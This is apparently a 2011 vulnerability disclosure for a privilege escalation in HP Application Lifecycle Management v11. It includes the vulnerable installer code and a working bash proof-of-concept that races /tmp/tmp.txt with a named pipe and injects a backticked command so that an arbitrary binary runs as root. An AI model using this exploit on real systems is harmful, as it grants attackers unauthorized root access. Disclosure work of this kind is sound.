================ Privilege escalation vulnerability in HP Application Lifestyle Management (ALM) Platform v11 Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940 ================ Description: ================ The HP Application Lifestyle Management configuration tool contains a vulnerable function 'GetInstalledPackages' which is called when upgrading or uninstalling HP ALM. The AIX, HP-UX and Solaris versions use /tmp/tmp.txt in a similar, insecure manner. ================ Timeline: ================ 30 November 2011 - Reported to HP. Ignored. 08 December 2011 - Public disclosure ================ Exploit: ================ #!/bin/bash # Simple PoC : Run as user, when vulnerable function is called # /home/user/binary_to_run_as_root is run as root. cat > file << EOF Child Components 0a29406d9794e4f9b30b3c5d6702c708 \`/home/user/binary_to_run_as_root\` EOF mkfifo /tmp/tmp.txt # set trap cat /tmp/tmp.txt # blocks for victim while [ -e /tmp/tmp.txt ]; do cat file > /tmp/tmp.txt sleep 2 done rm file -- ================ Details: ================ e.g. from GetInstalledPackages in SunOS_lib.sh (Solaris): --- prodreg info -u $PRODUCT_NAME > /tmp/tmp.txt <snip> firstRow=`awk '/Child Components/ { print NR;}' /tmp/tmp.txt` <snip> firstRow=`expr $firstRow + 3` lastRow=`awk 'END { print NR }' /tmp/tmp.txt` <snip> eval \child$numOfPackages=`awk '{ if ( NR == pattern ) { print $1 } }' pattern=$firstRow /tmp/tmp.txt` <snip> rm /tmp/tmp.txt ---